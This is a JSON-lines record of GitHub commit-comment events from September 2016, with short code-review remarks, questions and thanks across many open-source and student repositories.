{"id":"4582412040","type":"CommitCommentEvent","actor":{"login":"suzukisan22"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076366,"position":3,"line":3,"path":"app/views/tweets/new.html.erb","commit_id":"6b209987a89d397c684e74dbe81fd62f7040120d","created_at":"2016-09-19T10:08:58Z","updated_at":"2016-09-19T10:08:58Z","body":"了解しました。訂正します。"}},"created_at":"2016-09-19T10:08:58Z"}
{"id":"4582414919","type":"CommitCommentEvent","actor":{"login":"stanislavkisyov"},"repo":{"name":"stanislavkisyov/supreme-octo-happiness"},"payload":{"comment":{"id":19076370,"position":null,"line":null,"path":null,"commit_id":"555882e0dff1394a7149d5240ffc0931b3b7a1b2","created_at":"2016-09-19T10:09:28Z","updated_at":"2016-09-19T10:09:28Z","body":"ima problem"}},"created_at":"2016-09-19T10:09:28Z"}
{"id":"4582415370","type":"CommitCommentEvent","actor":{"login":"mycFelix"},"repo":{"name":"mycFelix/heron"},"payload":{"comment":{"id":19076372,"position":18,"line":33,"path":"website/content/docs/operators/deployment/schedulers/yarn.md","commit_id":"38be3f6844db54f800c2da380530e718dc782a97","created_at":"2016-09-19T10:09:36Z","updated_at":"2016-09-19T10:09:36Z","body":"Thank you so much for you suggestion. I will update it."}},"created_at":"2016-09-19T10:09:36Z"}
{"id":"4582415791","type":"CommitCommentEvent","actor":{"login":"suzukisan22"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076373,"position":null,"line":null,"path":null,"commit_id":"c46b8f74e97d58c5a442b3140f4f0042cbb68156","created_at":"2016-09-19T10:09:41Z","updated_at":"2016-09-19T10:09:41Z","body":"了解しました。"}},"created_at":"2016-09-19T10:09:41Z"}
{"id":"4582416636","type":"CommitCommentEvent","actor":{"login":"stanislavkisyov"},"repo":{"name":"stanislavkisyov/supreme-octo-happiness"},"payload":{"comment":{"id":19076377,"position":null,"line":null,"path":null,"commit_id":"555882e0dff1394a7149d5240ffc0931b3b7a1b2","created_at":"2016-09-19T10:09:53Z","updated_at":"2016-09-19T10:09:53Z","body":"djidj\r\n\r\n1. dd3d3d"}},"created_at":"2016-09-19T10:09:53Z"}
{"id":"4582417701","type":"CommitCommentEvent","actor":{"login":"Jessicabenasty"},"repo":{"name":"Jessicabenasty/scaling-meme"},"payload":{"comment":{"id":19076381,"position":27,"line":27,"path":"LICENSE","commit_id":"a7b33b4ab6f8152988aab73ff06c1dd1682c0ca1","created_at":"2016-09-19T10:10:11Z","updated_at":"2016-09-19T10:10:11Z","body":"a7b33b4"}},"created_at":"2016-09-19T10:10:11Z"}
{"id":"4582420672","type":"CommitCommentEvent","actor":{"login":"est31"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19076386,"position":null,"line":null,"path":null,"commit_id":"5b9c8dfbd26851268ae2cdaecafb255cc57d05cd","created_at":"2016-09-19T10:10:51Z","updated_at":"2016-09-19T10:10:51Z","body":"Thanks for pointing out! will push a fix shortly."}},"created_at":"2016-09-19T10:10:51Z"}
{"id":"4582420790","type":"CommitCommentEvent","actor":{"login":"Jessicabenasty"},"repo":{"name":"Jessicabenasty/scaling-meme"},"payload":{"comment":{"id":19076388,"position":38,"line":38,"path":"LICENSE","commit_id":"a7b33b4ab6f8152988aab73ff06c1dd1682c0ca1","created_at":"2016-09-19T10:10:53Z","updated_at":"2016-09-19T10:10:53Z","body":"a7b33b4"}},"created_at":"2016-09-19T10:10:53Z"}
{"id":"4582421442","type":"CommitCommentEvent","actor":{"login":"maksymshtyria"},"repo":{"name":"sasharadchenkos/auto"},"payload":{"comment":{"id":19076390,"position":null,"line":null,"path":null,"commit_id":"e064bef672a16bb29810f40a26fb7b0b8f0b541a","created_at":"2016-09-19T10:11:02Z","updated_at":"2016-09-19T10:11:02Z","body":"Great Job!"}},"created_at":"2016-09-19T10:11:02Z"}
{"id":"4582425869","type":"CommitCommentEvent","actor":{"login":"maksymshtyria"},"repo":{"name":"sasharadchenkos/auto"},"payload":{"comment":{"id":19076399,"position":21,"line":21,"path":"src/com/auto/Character.java","commit_id":"fe8b80f31b2e2e85254c8434fa07c88a298e0212","created_at":"2016-09-19T10:12:08Z","updated_at":"2016-09-19T10:12:08Z","body":"what does it smile mean?"}},"created_at":"2016-09-19T10:12:08Z"}
{"id":"4582426038","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19076401,"position":12,"line":328,"path":"src/full/Agda/TypeChecking/Substitute.hs","commit_id":"bf9ff1e676d51ce35d50658b6274ecdb8b60fda2","created_at":"2016-09-19T10:12:12Z","updated_at":"2016-09-19T10:12:12Z","body":"It was difficult justifying the implementation, since it turns out it wasn't actually correct (#2193). The new fix (95ac721) also includes justifications..."}},"created_at":"2016-09-19T10:12:12Z"}
{"id":"4582426903","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076404,"position":77,"line":119,"path":"src/gear/codepoint_translator.cc","commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T10:12:23Z","updated_at":"2016-09-19T10:12:23Z","body":"` = \"\"` is not necessary. `std::string` is initialized to empty string by default."}},"created_at":"2016-09-19T10:12:23Z"}
{"id":"4582427177","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"robreczarek/jspractice"},"payload":{"comment":{"id":19076405,"position":1,"line":1,"path":"test-zoo.js","commit_id":"9e2e5a428da26cec914bf3f9469c00847f504fa3","created_at":"2016-09-19T10:12:27Z","updated_at":"2016-09-19T10:12:27Z","body":"Main file in project should be named as `index.js`"}},"created_at":"2016-09-19T10:12:27Z"}
{"id":"4582428162","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"alanjc7/coding_club"},"payload":{"comment":{"id":19076409,"position":4,"line":41,"path":"challenges/challenge_2.rb","commit_id":"9c545c2ae05133db5d258e323c2f20dba72ec398","created_at":"2016-09-19T10:12:41Z","updated_at":"2016-09-19T10:12:41Z","body":"Don't forget to leave a space between your variables and the operator.\r\n`indatareverse = indata.reverse`\r\nAlso, you can use an underscore to separate words in your variables and make them more readable, ie `indata_reverse`"}},"created_at":"2016-09-19T10:12:41Z"}
{"id":"4582430369","type":"CommitCommentEvent","actor":{"login":"maksymshtyria"},"repo":{"name":"sasharadchenkos/auto"},"payload":{"comment":{"id":19076415,"position":null,"line":null,"path":null,"commit_id":"fe8b80f31b2e2e85254c8434fa07c88a298e0212","created_at":"2016-09-19T10:13:14Z","updated_at":"2016-09-19T10:13:14Z","body":"Not bad!!!"}},"created_at":"2016-09-19T10:13:14Z"}
{"id":"4582431188","type":"CommitCommentEvent","actor":{"login":"Jessicabenasty"},"repo":{"name":"Jessicabenasty/scaling-meme"},"payload":{"comment":{"id":19076419,"position":134,"line":134,"path":"LICENSE","commit_id":"a7b33b4ab6f8152988aab73ff06c1dd1682c0ca1","created_at":"2016-09-19T10:13:24Z","updated_at":"2016-09-19T10:13:24Z","body":"a7b33b4"}},"created_at":"2016-09-19T10:13:24Z"}
{"id":"4582431815","type":"CommitCommentEvent","actor":{"login":"dashingshakeel"},"repo":{"name":"dashingshakeel/phone_book"},"payload":{"comment":{"id":19076420,"position":null,"line":null,"path":null,"commit_id":"9defd824cb2831aad5c9befed1770d8868461afe","created_at":"2016-09-19T10:13:32Z","updated_at":"2016-09-19T10:13:32Z","body":"that was mistakenly commited\r\n"}},"created_at":"2016-09-19T10:13:32Z"}
{"id":"4582435679","type":"CommitCommentEvent","actor":{"login":"ijunaidfarooq"},"repo":{"name":"dashingshakeel/phone_book"},"payload":{"comment":{"id":19076426,"position":null,"line":null,"path":null,"commit_id":"9defd824cb2831aad5c9befed1770d8868461afe","created_at":"2016-09-19T10:14:30Z","updated_at":"2016-09-19T10:14:30Z","body":"Be specific and clear in what you do.\n\n\n\nRegards\n\n\n*Junaid Farooq*\nSoftware Developer, Evercam.io\n+92334- <+92347-8666955>6944005 | junaid@evercam.io | Evercam\n<http://evercam.io/> | Skype: darulehsan1\n<https://mail.google.com/mail/u/0/#>\n<http://www.facebook.com/iOkay.uOkay>  <http://pk.linkedin.com/in/iamjunnii>\n  <http://github.com/ijunaidfarooq>\n\nOn 19 September 2016 at 15:13, shakeel rauf <notifications@github.com>\nwrote:\n\n> that was mistakenly commited\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dashingshakeel/phone_book/commit/9defd824cb2831aad5c9befed1770d8868461afe#commitcomment-19076420>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AM7wjxR9pcOS4o2YHm52fdMX2vE1fw2vks5qrmBNgaJpZM4KATc4>\n> .\n>\n"}},"created_at":"2016-09-19T10:14:30Z"}
{"id":"4582435885","type":"CommitCommentEvent","actor":{"login":"mihailik"},"repo":{"name":"jeffpar/pcjs"},"payload":{"comment":{"id":19076427,"position":null,"line":null,"path":null,"commit_id":"6f349612d825fdfc23f471d8e6f9b26ca40fcb08","created_at":"2016-09-19T10:14:33Z","updated_at":"2016-09-19T10:14:33Z","body":":+1: Being able to run without Java is a major WIN!! for me, thanks a lot"}},"created_at":"2016-09-19T10:14:33Z"}
{"id":"4582443447","type":"CommitCommentEvent","actor":{"login":"dashingshakeel"},"repo":{"name":"dashingshakeel/phone_book"},"payload":{"comment":{"id":19076449,"position":null,"line":null,"path":null,"commit_id":"9defd824cb2831aad5c9befed1770d8868461afe","created_at":"2016-09-19T10:16:17Z","updated_at":"2016-09-19T10:16:17Z","body":"next time i will take care of this"}},"created_at":"2016-09-19T10:16:17Z"}
{"id":"4582445871","type":"CommitCommentEvent","actor":{"login":"killabytenow"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19076458,"position":34,"line":2145,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-19T10:16:53Z","updated_at":"2016-09-19T10:16:53Z","body":"removed"}},"created_at":"2016-09-19T10:16:53Z"}
{"id":"4582446237","type":"CommitCommentEvent","actor":{"login":"killabytenow"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19076459,"position":36,"line":2147,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-19T10:16:58Z","updated_at":"2016-09-19T10:16:58Z","body":"removed if"}},"created_at":"2016-09-19T10:16:58Z"}
{"id":"4582446622","type":"CommitCommentEvent","actor":{"login":"killabytenow"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19076462,"position":43,"line":2154,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-19T10:17:05Z","updated_at":"2016-09-19T10:17:05Z","body":"fixed"}},"created_at":"2016-09-19T10:17:05Z"}
{"id":"4582446669","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076463,"position":34,"line":86,"path":"src/gear/codepoint_translator.cc","commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T10:17:06Z","updated_at":"2016-09-19T10:17:06Z","body":"1. Change the parameter declaration to `(const string& code)` to be consistent with the anonymous functions.\r\nPlease also change the anonymous functions to `[](const string& code) {...}`.\r\n\r\n2. Make `converters_` a member variable of the translator class, and populate the converter functions once in the constructor or an `Initialize()` method, instead of creating the map on every call to `Query()`. \r\n\r\n"}},"created_at":"2016-09-19T10:17:06Z"}
{"id":"4582446778","type":"CommitCommentEvent","actor":{"login":"killabytenow"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19076464,"position":47,"line":2158,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-19T10:17:08Z","updated_at":"2016-09-19T10:17:08Z","body":"fixed"}},"created_at":"2016-09-19T10:17:08Z"}
{"id":"4582451707","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076469,"position":93,"line":125,"path":"src/gear/codepoint_translator.cc","commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T10:18:19Z","updated_at":"2016-09-19T10:18:19Z","body":"Use `converted.empty()`"}},"created_at":"2016-09-19T10:18:19Z"}
{"id":"4582451984","type":"CommitCommentEvent","actor":{"login":"caiqinghua"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":19076470,"position":null,"line":null,"path":null,"commit_id":"9f5c641a4006bd71bf4c2d76c7446cb6e6bfce49","created_at":"2016-09-19T10:18:23Z","updated_at":"2016-09-19T10:18:23Z","body":"@jmcorgan How can i receive hashtx and hashblock from bitcoind by zmq subscribe?\r\n1. install bitcoind by sudo apt install bitcoind in Ubuntu 16.04 server amd64(https://bitcoin.org/en/full-node#ubuntu-1410)\r\n2. bitcoind --version show v0.13 ga402396\r\n3. bitcoind -daemon -zmqpubhashblock=tcp://127.0.0.1:28332 -zmqpubhashtx=tcp://127.0.0.1:28332\r\nafter download, blocks file is 89G.\r\n4. git clone https://github.com/bitcoin/bitcoin\r\n5. cd bitcoin/contrib/zmq and pip install zmq, then do python zmq_sub.py and i can't receive anything in long wait.\r\nHow can i receive hashtx and hashblock from bitcoind."}},"created_at":"2016-09-19T10:18:23Z"}
{"id":"4582453627","type":"CommitCommentEvent","actor":{"login":"kholk"},"repo":{"name":"sonyxperiadev/kernel"},"payload":{"comment":{"id":19076473,"position":null,"line":null,"path":null,"commit_id":"beefc265c1c11b87529fac01a67b68c288b95894","created_at":"2016-09-19T10:18:48Z","updated_at":"2016-09-19T10:18:48Z","body":"I am looking at some other bugs on other platforms. When I'll be done with this, I will happily add the dsds DT for Tulip :) "}},"created_at":"2016-09-19T10:18:48Z"}
{"id":"4582456725","type":"CommitCommentEvent","actor":{"login":"killabytenow"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19076483,"position":529,"line":523,"path":"libr/anal/p/anal_avr.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-19T10:19:32Z","updated_at":"2016-09-19T10:19:32Z","body":"removed"}},"created_at":"2016-09-19T10:19:32Z"}
{"id":"4582457044","type":"CommitCommentEvent","actor":{"login":"hm1992"},"repo":{"name":"julianstorer/JUCE"},"payload":{"comment":{"id":19076484,"position":null,"line":null,"path":null,"commit_id":"d03755c9e04f42ced42c089f4a27730ce7610542","created_at":"2016-09-19T10:19:37Z","updated_at":"2016-09-19T10:19:37Z","body":"@hogliux: I assume this is in reference to #110"}},"created_at":"2016-09-19T10:19:37Z"}
{"id":"4582458875","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076490,"position":4,"line":45,"path":"src/gear/codepoint_translator.cc","commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T10:20:03Z","updated_at":"2016-09-19T10:20:03Z","body":"Make this global function `static` (visible only in this cpp)."}},"created_at":"2016-09-19T10:20:03Z"}
{"id":"4582460505","type":"CommitCommentEvent","actor":{"login":"Jessicabenasty"},"repo":{"name":"wszf/androrat"},"payload":{"comment":{"id":19076495,"position":23,"line":53,"path":"src/AndroratServer/src/gui/panel/VideoPanel.java","commit_id":"6de7014558f8af751b903bdb42eb2976733cc38f","created_at":"2016-09-19T10:20:25Z","updated_at":"2016-09-19T10:20:25Z","body":"Before"}},"created_at":"2016-09-19T10:20:25Z"}
{"id":"4582462852","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":19076500,"position":6,"line":133,"path":"redaxo/src/core/lib/response.php","commit_id":"173ef7ce9b371fbd37c0b15f5dd70121b919dff1","created_at":"2016-09-19T10:20:59Z","updated_at":"2016-09-19T10:20:59Z","body":"sicher dass dies nötig ist? normalerweise versucht man die connection ja am leben zu halten (keep-alive)"}},"created_at":"2016-09-19T10:20:59Z"}
{"id":"4582463616","type":"CommitCommentEvent","actor":{"login":"samukce"},"repo":{"name":"getsentry/raven-csharp"},"payload":{"comment":{"id":19076502,"position":null,"line":null,"path":null,"commit_id":"7000e25855934c712fb8cb0a7844b67b312cd85b","created_at":"2016-09-19T10:21:10Z","updated_at":"2016-09-19T10:21:10Z","body":"Hi, one question. Are there test to assign tags values?\r\nSome like this:\r\n\r\n```csharp\r\nAssert.That(new SentryEvent().Tags, Is.Not.Null);\r\n```\r\nand \r\n\r\n```csharp\r\nvar sentryEvent = new SentryEvent {Tags = null};\r\n Assert.That(sentryEvent.Tags, Is.Not.Null);\r\n```"}},"created_at":"2016-09-19T10:21:10Z"}
{"id":"4582465039","type":"CommitCommentEvent","actor":{"login":"gpavlova"},"repo":{"name":"gpavlova/first1"},"payload":{"comment":{"id":19076507,"position":1,"line":1,"path":"test","commit_id":"1b09994c654fd817175e85d8c1dcb6fbcae2eeea","created_at":"2016-09-19T10:21:30Z","updated_at":"2016-09-19T10:21:30Z","body":"new2"}},"created_at":"2016-09-19T10:21:30Z"}
{"id":"4582466902","type":"CommitCommentEvent","actor":{"login":"jollaman999"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19076512,"position":null,"line":null,"path":null,"commit_id":"0bfbdf9c87614156c23e3dfebf0977247618f2c9","created_at":"2016-09-19T10:21:55Z","updated_at":"2016-09-19T10:21:55Z","body":"How about performance with zen io?"}},"created_at":"2016-09-19T10:21:55Z"}
{"id":"4582470142","type":"CommitCommentEvent","actor":{"login":"asbjornu"},"repo":{"name":"getsentry/raven-csharp"},"payload":{"comment":{"id":19076520,"position":null,"line":null,"path":null,"commit_id":"7000e25855934c712fb8cb0a7844b67b312cd85b","created_at":"2016-09-19T10:22:42Z","updated_at":"2016-09-19T10:22:42Z","body":"@samukce: Good idea. Happy to receive a PR!"}},"created_at":"2016-09-19T10:22:42Z"}
{"id":"4582476188","type":"CommitCommentEvent","actor":{"login":"popomore"},"repo":{"name":"koajs/csrf"},"payload":{"comment":{"id":19076532,"position":null,"line":null,"path":null,"commit_id":"9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe","created_at":"2016-09-19T10:24:11Z","updated_at":"2016-09-19T10:24:11Z","body":"Why don't you update the history, and where is the 3.0.0 and 3.0.1 release commit."}},"created_at":"2016-09-19T10:24:11Z"}
{"id":"4582478079","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"irenealgi/RubyLearning"},"payload":{"comment":{"id":19076537,"position":6,"line":6,"path":"Homework/week2.rb","commit_id":"e15126d7d8f95b7a6737d8886f8cf66c8ab43cdf","created_at":"2016-09-19T10:24:37Z","updated_at":"2016-09-19T10:24:37Z","body":"You can just use `$stdin.gets.chomp` so you don't have to require 'io/console'.\r\nRemember to add comments to remind you what your code does."}},"created_at":"2016-09-19T10:24:37Z"}
{"id":"4582479054","type":"CommitCommentEvent","actor":{"login":"Jessicabenasty"},"repo":{"name":"wszf/androrat"},"payload":{"comment":{"id":19076542,"position":4,"line":95,"path":"src/AndroratServer/src/gui/panel/messages_zh.properties","commit_id":"6de7014558f8af751b903bdb42eb2976733cc38f","created_at":"2016-09-19T10:24:53Z","updated_at":"2016-09-19T10:24:53Z","body":"6de7014"}},"created_at":"2016-09-19T10:24:53Z"}
{"id":"4582479582","type":"CommitCommentEvent","actor":{"login":"tusharncuelogic"},"repo":{"name":"tusharncuelogic/Training-Angular"},"payload":{"comment":{"id":19076543,"position":2,"line":2,"path":"api/routes.js","commit_id":"65535f41886c7fc1e469d74b6c2a4a6f672f6c7c","created_at":"2016-09-19T10:25:01Z","updated_at":"2016-09-19T10:25:01Z","body":"I was just trying to create the separate route file . And this code was\njust for testing the route for api url in the future . I have changed the\nreplaced the server.js with the old code .\n\nOn Mon, Sep 19, 2016 at 2:15 PM, Shital Agarwal <notifications@github.com>\nwrote:\n\n> @tusharncuelogic <https://github.com/tusharncuelogic> Can you explain\n> what's happening in this code?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tusharncuelogic/Training-Angular/commit/65535f41886c7fc1e469d74b6c2a4a6f672f6c7c#commitcomment-19075316>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVBm4TioIDaaUFcOdRk_Pt9yb6BIzX-fks5qrkuegaJpZM4KAQTW>\n> .\n>\n"}},"created_at":"2016-09-19T10:25:01Z"}
{"id":"4582483983","type":"CommitCommentEvent","actor":{"login":"Manu777"},"repo":{"name":"Manu777/imad-2016-app"},"payload":{"comment":{"id":19076556,"position":null,"line":null,"path":null,"commit_id":"58a479f54a0af261d580375ac3a107cbe79a7500","created_at":"2016-09-19T10:26:05Z","updated_at":"2016-09-19T10:26:05Z","body":"<html>\r\n <head>\r\n  <title>\r\n      Article-Two Mehul Jain\r\n  </title>\r\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\r\n </head>\r\n    <body>\r\n     <div>\r\n         <a href = '/'>Home</a>\r\n     </div>\r\n     <hr/>\r\n     <h3>\r\n         Article Two\r\n     </h3>\r\n     <div>\r\n         Sept 5, 2016\r\n     </div>\r\n     <div>\r\n         <p>\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n             This is the content of my first article. This is the content of my first article.\r\n         </p>\r\n         <p>\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n             This is the content of my first article. This is the content of my first article.\r\n         </p>\r\n         <p>\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n             This is the content of my first article. This is the content of my first article. This is the content of my first article.\r\n              This is the content of my first article. This is the content of my first article.\r\n              </p>\r\n       \r\n     </div>\r\n     \r\n    </body>\r\n</html>\r\n"}},"created_at":"2016-09-19T10:26:05Z"}
{"id":"4582484246","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19076557,"position":49,"line":49,"path":"subprojects/core/src/main/java/org/gradle/api/internal/changedetection/state/FileDetails.java","commit_id":"c99b3e738419e8ca858ccabb3e5905d21adde3a7","created_at":"2016-09-19T10:26:09Z","updated_at":"2016-09-19T10:26:09Z","body":"I think it means whether the element is present in the file collection (i.e. it's among the files returned by `getFiles()`), or is a file that is included via one of the roots (i.e. via walking a directory that is an `isRoot()`)."}},"created_at":"2016-09-19T10:26:09Z"}
{"id":"4582485075","type":"CommitCommentEvent","actor":{"login":"woodsh"},"repo":{"name":"woodsh/avtosteklo"},"payload":{"comment":{"id":19076558,"position":null,"line":null,"path":null,"commit_id":"7a892169241c8155eebcbb1d1869b8c52dac3696","created_at":"2016-09-19T10:26:20Z","updated_at":"2016-09-19T10:26:20Z","body":"ok"}},"created_at":"2016-09-19T10:26:20Z"}
{"id":"4582489971","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"irenealgi/RubyLearning"},"payload":{"comment":{"id":19076572,"position":25,"line":25,"path":"Homework/week2.rb","commit_id":"e15126d7d8f95b7a6737d8886f8cf66c8ab43cdf","created_at":"2016-09-19T10:27:29Z","updated_at":"2016-09-19T10:27:29Z","body":"A comment here would be handy to explain what `reverse!` and `join` do and what `\"\\n\"` is."}},"created_at":"2016-09-19T10:27:29Z"}
{"id":"4582503255","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076603,"position":385,"line":2574,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T10:30:42Z","updated_at":"2016-09-19T10:30:42Z","body":"Particularly yucky, but I don't have a better suggestion"}},"created_at":"2016-09-19T10:30:42Z"}
{"id":"4582504146","type":"CommitCommentEvent","actor":{"login":"rachanta"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19076604,"position":null,"line":null,"path":null,"commit_id":"0bfbdf9c87614156c23e3dfebf0977247618f2c9","created_at":"2016-09-19T10:30:54Z","updated_at":"2016-09-19T10:30:54Z","body":"So far no issue. I've been running with Zen for about 2 days. Is there anything I should specifically check?"}},"created_at":"2016-09-19T10:30:54Z"}
{"id":"4582505227","type":"CommitCommentEvent","actor":{"login":"DevilaN"},"repo":{"name":"KDE/plasma-workspace"},"payload":{"comment":{"id":19076606,"position":null,"line":null,"path":null,"commit_id":"1ed7209f08aa69cec7847c606da8a2fc091dc603","created_at":"2016-09-19T10:31:11Z","updated_at":"2016-09-19T10:31:11Z","body":"This is ridiculous!\r\n\r\nIDK whether this was intentional change, but it was one of most stupid things ever. Changing behaviour of click action and throwing enigmatic message?\r\nWhy the hell this is not corrected by now?"}},"created_at":"2016-09-19T10:31:11Z"}
{"id":"4582511634","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19076619,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-19T10:32:46Z","updated_at":"2016-09-19T10:32:46Z","body":"I think the discrepancy is because the arrow sprite isnt being used here and thus the coordinates dont match with :hover\r\n```\r\n.sidebar-module .arrow-btn {\r\n\tbackground-image: url(/assets/images/expand-arrows.png);\r\n\tbackground-repeat: no-repeat;\r\n\tbackground-position: -3px -3px;\r\n\twidth: 30px;\r\n\theight: 100%;\r\n\tpadding: 0 4px;\r\n\ttext-decoration: none;\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\ttop: 0;\r\n\tbackground-color: transparent;\r\n}\r\n```\r\n\r\neh tbh idk... but after looking at api page again the issue persists,"}},"created_at":"2016-09-19T10:32:46Z"}
{"id":"4582515855","type":"CommitCommentEvent","actor":{"login":"globin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19076631,"position":null,"line":null,"path":null,"commit_id":"4ec5e729c470bdad498777cd399e84cd461902eb","created_at":"2016-09-19T10:33:48Z","updated_at":"2016-09-19T10:33:48Z","body":"Should be fixed with a9e87314ab382f62af6b063b5aca6f5fbf85b104, I must have messed up while cherry-picking/merging.. Sorry.."}},"created_at":"2016-09-19T10:33:48Z"}
{"id":"4582517579","type":"CommitCommentEvent","actor":{"login":"lafita"},"repo":{"name":"josemduarte/biojava"},"payload":{"comment":{"id":19076634,"position":38,"line":38,"path":"biojava-integrationtest/src/test/java/org/biojava/nbio/structure/test/geometry/TestProteinSuperposition.java","commit_id":"73c98a45f503352e8d3ffdf778d9ee8aeee345c3","created_at":"2016-09-19T10:34:15Z","updated_at":"2016-09-19T10:34:15Z","body":"There is already a method in `CalcPoint` called `clonePoint3dArray` that does the same."}},"created_at":"2016-09-19T10:34:15Z"}
{"id":"4582519837","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19076647,"position":83,"line":65,"path":"mllib-tests/v1p5/src/main/scala/mllib/perf/BidMACHConverters.scala","commit_id":"62732d366f382eef6bab74f73307b1fbd1521aa6","created_at":"2016-09-19T10:34:50Z","updated_at":"2016-09-19T10:34:50Z","body":"teoretycznie moglibyśmy spróbować uniknąć tej alokacji"}},"created_at":"2016-09-19T10:34:50Z"}
{"id":"4582521257","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19076650,"position":85,"line":67,"path":"mllib-tests/v1p5/src/main/scala/mllib/perf/BidMACHConverters.scala","commit_id":"62732d366f382eef6bab74f73307b1fbd1521aa6","created_at":"2016-09-19T10:35:14Z","updated_at":"2016-09-19T10:35:14Z","body":"teoretycznie moglibyśmy napieprzać od razu na dysk, a nie do tablicy floatów"}},"created_at":"2016-09-19T10:35:14Z"}
{"id":"4582524417","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076659,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T10:35:59Z","updated_at":"2016-09-19T10:35:59Z","body":"So if variable font A covers a weight range of 70 to 930, I just say in the descriptor that it has weight 500. And variable font B covers 400 to 500, I say it has weight 450. Then if weight 150 is requested, 450 is closest so B is downloaded and whoops, it can't make 150. But A could have."}},"created_at":"2016-09-19T10:35:59Z"}
{"id":"4582524893","type":"CommitCommentEvent","actor":{"login":"maloshuk"},"repo":{"name":"cefsharp/CefSharp"},"payload":{"comment":{"id":19076661,"position":null,"line":null,"path":null,"commit_id":"7ea838780275ad09639558aeb73bfd896a94e9cd","created_at":"2016-09-19T10:36:08Z","updated_at":"2016-09-19T10:36:08Z","body":"We create and destroy ChromiumWebBrowser instances often. \r\nWe notice that after several hours of application work it consume a lot of CPU time even when all business logic in program was stopped. The load produced by Dispatcher.Invoke() calls.\r\n\r\nAnalyse revealed that problem was in ChromiumWebBrowser class. Namely in running dispatcher timers. Each call of the Load() function creates new timer. Old timer not stopped and continues. After hundreds of Load() calls CPU load becomes noticeable (2-4%). Thousands of running dispatcher timers can load core by 100%. \r\nProposed fix adds Stop timer calls when they are not needed any longer."}},"created_at":"2016-09-19T10:36:08Z"}
